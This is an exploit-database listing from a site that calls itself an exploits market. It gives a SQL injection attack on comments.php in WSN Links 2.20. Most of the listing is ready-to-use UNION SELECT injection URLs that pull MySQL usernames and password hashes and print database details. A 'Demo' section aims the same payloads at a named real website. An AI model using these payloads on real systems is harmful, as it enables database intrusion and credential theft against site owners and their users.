[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WSN Links 2.20 (comments.php) SQL Injection Vulnerability

Author
DevilZ TM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3720
Category
web applications
Date add
21-09-2008
Platform
unsorted
=========================================================
WSN Links 2.20 (comments.php) SQL Injection Vulnerability
=========================================================


[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
[~]
[~] http://scripts.webmastersite.net/wsnlinks/
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 21.09.2008
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~] 
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
[~]
[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~] 
[~] Demo :- 
[~]
[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
[~]
[~]----------------------------------------------------------------------------------------------------------------------




#  0day.today [2024-12-25]  #